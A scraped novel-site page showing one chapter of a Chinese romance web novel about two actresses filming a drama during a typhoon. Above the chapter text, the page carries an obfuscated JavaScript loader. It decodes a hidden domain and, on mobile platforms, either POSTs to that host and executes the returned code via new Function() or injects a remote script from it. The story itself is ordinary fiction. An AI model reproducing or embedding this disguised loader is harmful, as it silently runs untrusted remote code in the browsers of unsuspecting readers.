98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(39(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

宋若挂掉了电话。

孟璟收了线,移了移位置,朝跟前人伸出手麻烦你了。

当天那块儿所有的摄像头录下来的影像,我都拷在这里边了。来人是个戴着眼镜的小青年,脸颊变得红通通,小孟总还有什么需要可以直接微信告诉我。

好,谢谢。孟璟点头。说着探身朝未婚妻的窗户望了一眼,发现窗帘已经放下来了,舒出一口气,转身回房间。

电脑开机音乐过后,她将移动硬盘连上电脑,打开一探究竟。虽说那天看到了吕清義,她心里也有那么个猜想,但凡事不能想当然,还得讲证据。谨防冤枉无辜是一方面,更重要的,万一还有别的什么冲着小药瓶子来的坏蛋,要是就这么放过了,岂不是一桩隐患。

她必须把这个人找出来。

关键是当时天色已晚,拍得不咋清楚。一开始她还是睁大双眼看着,盯久了,渐渐双目发涩,她单手撑着下巴,截取目标时间段,一帧一帧看。

敲击鼠标的哒哒声以规律的间隔响彻整个房间,突然一顿,孟璟微眯的双眼也猛然睁大了,勾勾嘴角,轻呵了一声。

宋若仿佛是为了预防自己再伏着窗往下看,不但放下了窗帘,还离窗口远远的,坐在床上记台词。看了会儿,剧本晾在床头柜,两手轻搂住肩,蹙眉回想白日里拍戏的那一幕,孟璟将她往后狠狠一推,却在拍摄的死角伸手替她做缓冲。还有,发生意外的时候,眼明手快地将她拉到身前护着,活生生地替她挡了。

她到底为什么要这样?

心里被某种陌生而奇怪的感觉充斥着,涨涨的。实际上,春天里要破土而出的幼苗,在暗黑的地下奋力拼搏时,周身就是这种感觉。宋若将下巴磕在两膝之间,睫毛轻轻覆下来。足趾是小颗小颗的,近于莹白,与白床单几乎融为一体。她怔怔地动了动足趾。

窗外忽然传来噼里啪啦的爆裂敲击声,将她的注意力吸引了过去。

这个世界很神奇,夏天的雨并不一定暴虐,一场初秋的雨,雨势竟又这样足。

她走到窗边揭开窗帘往下看看,露天泳池里涟漪鼎盛,已经没有人在那了。她给抹香鲸发了个消息,问她现在做什么,得到答复在看剧本后,她径直到对面敲门。

门一打开,孟璟连鞋都没穿,一脸兴奋老婆,你来找我。

宋若闭了闭眼睛,你的伤怎么样。

什么伤?我都说了我没事啦。孟璟让她进来,自己先在一张椅子里坐下,背靠着椅子,一脸老婆你怎么这么小题大做的表情。

宋若坐在对面,把孟爷爷的电话告知她,然后抿着嘴不说话,定定地看着她。

被她这样的目光望着,孟璟万般不自在,在椅子里换了好几个姿势,最终举起双手投降好了好了,我服了你了,我真没事啊,活蹦乱跳的嘛这不是,我没拨视频,是因为,是因为哎呀过两天老头子生日嘛,我想制造一点小别的感觉,见面看到我更开心咯。

孟璟心想真的大意了,就这,老头子和小药瓶子都能发现不对。

宋若蹙眉道你这是真话?

骗你干啥。孟璟咳嗽,你实在是太不了解我了,我要是为了你受了伤,哎唷,我还不拿来作为一生的把柄,我不碰瓷碰到你破产才怪,我会假装自己动不了瘫了,让你养我一辈子,让你爱我一辈子,你信不信?我们家做生意的,我随我爸的经商头脑,凡事只有赚。

宋若听她说得一套一套的,那点疑心又消解了大半,歪头望望她,再确认了一次,真的没事?

没事。孟璟舔舔嘴唇,坏笑,既然来我房了,就在这睡吧,嗯?

宋若起身,头也不回地回了房间。

原本以为这雨晚上准停的。

然而这股强势降雨一直持续到次日。

小横店的天地间是白茫茫的一片。

人走在外边即使打了伞,差不多都能被淋傻。

天气预报说要下到傍晚才止。

傍晚也没停,反而还加上了台风。

台风日,全组停工休整,饰演郑母的老戏骨亲自下厨,给大家做手工饺子。算是整个剧组的团建活动。吃完一顿团圆饭后,宋若与孟璟回房间,看着天色,愁眉道这天这样,爷爷生日咱们怎么回去。

孟璟失笑哎呀,真是我的好老婆了,记挂我们家老头子比我还上心。

隔日,依旧暴雨。

倪俊忍不住拍膝画圆,原定的拍摄计划又得变。本来要拍的是两场室外戏,一场是学校体育课,两人之间发生的冲突,一场是白家年会,强吻戏。可以说是影片前期最爆炸性的镜头。也是景郑二人纠缠半生的确切。

倪俊是讲究条理的人,计划生变会让他陡然不耐,副导演与他合作很久,知道他的脾性,捧着保温杯里的姜茶,吸了吸鼻子,建议道要不今天先拍室内戏吧。

倪俊自然也是这个打算,说来依然遗憾只好这样。

场地布置好以后,演员准备就绪。

其一是景知安拒绝当班委的戏。原班长参加田径比赛获奖,被录取到省田径队去之后,班长的位子就空了下来,景知安虽然是空降,在几次大考中成绩惊人,班主任当着全班对她委以重任,没想到景知安却一口回绝了,她的理由是我不适合,我的个性比较沉闷,也可以说比较自私,当班委需要自我奉献的精神,我不认为我有。然而班主任坚持知安很负责任,我从来不会看错人。

第二场是在阅览室。

景知安不在学校午休,有中午阅读的习惯。

倪俊给孟璟讲戏郑遂心不喜欢读书,逛到这边来纯属躲雨,看到架子上的书记住脸上要有嫌恶,但是看到景知安,你的脸得变,但过渡要自然,别浮夸。随后你坐下来,坐在她对面,表面的你一本正经,重点戏在桌子下边的腿,你用腿去攀住景知安,但是注意动作幅度,不要让别的人发现。你吃准了景知安息事宁人的性格,你不吵到别人,她不愿意声张。

孟璟调侃道倪导好像很有经验的样子。是不是这么追陈老师的啊?

陈轩正在现场,捧着咖啡等宋若的戏,孟璟又朝他问陈老师,是不是这样?

陈轩不语,只抿着嘴笑。

倪俊嘿了一声,孟璟这人是本来没有顾忌,这么些天熟了以后,倪俊也不再把孟璟当成什么小孟总,在他眼里,现在她就一傻白甜二世祖,平易近人又没架子卷起手中的本子在她头顶一敲,没大没小!

各就各位,孟璟依言行事。郑遂心进到自习室,先作势拍打着身上的雨水,成功发现景知安的身影,她看到她时,景知安正抬手挽了挽一缕散发,细白的手指勾起一缕乌发别至耳后,整个人安静美好得像是一个梦。她的使命就是打碎她的安静。她拎着本书,悄然坐到她对面,景知安没有注意她,于是郑遂心咬了咬下唇,桌下的双腿半抬起来,将对面女生的一双腿合抱住。景知安浑身一僵,抬头朝她望过来,足下使劲,想要摆脱这突如其来的钳制,奈何她不愿意吵到身边同在看书的人,当郑遂心坏笑着装模作样地看书时,她也只能将视线移到了书上。

卡这条顺利过了。

午饭两个人一起吃的。除了精致可口的小菜,孟璟还订了个三层果盘,带到宋若房间,捎上俩小助理一道。这是宋若同一次见到双胞胎兄弟同框,明知有些不礼貌,还是没忍住朝两人多看了几眼。两人的动作几乎一致。平时分开看不觉得,放在一起,才发现两人性格差别很大。苏小康健谈,苏小健却是沉默担当。

吃到一半,宋若问孟璟今天回家还是明天?

孟璟跟想起什么似的,放下手中的餐具,不说我还忘了,昨上午我和倪导说好了,明天不拍咱俩的戏,今晚咱就回家吧。

倪俊知道她们要回去,下午只补拍了几个镜头,早早地让两人收工了。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间